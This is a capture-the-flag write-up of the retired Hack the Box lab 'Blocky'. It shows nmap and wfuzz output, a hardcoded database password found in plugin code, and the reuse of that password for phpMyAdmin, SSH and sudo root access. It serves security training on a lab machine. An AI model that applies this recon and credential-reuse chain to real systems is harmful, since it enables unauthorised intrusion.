Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is a retried vulnerable lab presented by Hack the Box

Level : Easy

Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.37
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 19:50 W. Europe Summer Time
Nmap scan report for 10.10.10.37
Host is up (0.030s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.67 seconds

Knowing port 80 is open in victim’s network I opened it’s IP in the browser but didn’t get any remarkable clue on its welcome page.

Next, we use wfuzz to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.37/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.37/FUZZ
Total requests: 220551

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000003: C=200 313 L 3592 W 52256 Ch "# Copyright 2007 James Fisher"
000004: C=200 313 L 3592 W 52256 Ch "#"
000001: C=200 313 L 3592 W 52256 Ch "# directory-list-2.3-medium.txt"
000002: C=200 313 L 3592 W 52256 Ch "#"
000005: C=200 313 L 3592 W 52256 Ch ""
000181: C=301 9 L 28 W 309 Ch "wiki"
000232: C=301 9 L 28 W 315 Ch "wp-content"
000510: C=301 9 L 28 W 312 Ch "plugins"
000777: C=301 9 L 28 W 316 Ch "wp-includes"
001064: C=301 9 L 28 W 315 Ch "javascript"
007171: C=301 9 L 28 W 313 Ch "wp-admin"
010816: C=301 9 L 28 W 315 Ch "phpmyadmin"
013818: C=404
package com.myfirstplugin;

public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
public BlockyCore() {}
public void onServerStart() {}
public void onServerStop() {}
public void onPlayerJoin()
{
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(String username, String message) {}
}

Then I explore http://10.10.10.37/phpmyadmin and login into phpmyadmin server using above credential

Then opened the WordPress database for stealing username from here and I found a user login: Notch with user Id 1.

Now I try to access victim’s system  shell through SSH

PS C:\Users\jacco> ssh notch@10.10.10.37
notch@10.10.10.37's password:8YsqfCTnvxAUeduzjNSXe22
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ cat user.txt
59f*****3cd5

notch@Blocky:~$ sudo -l
[sudo] password for notch:8YsqfCTnvxAUeduzjNSXe22
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# cd ..
root@Blocky:/home# cd ..
root@Blocky:/# cd root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
0a9*****cd5f

Author: Jacco Straathof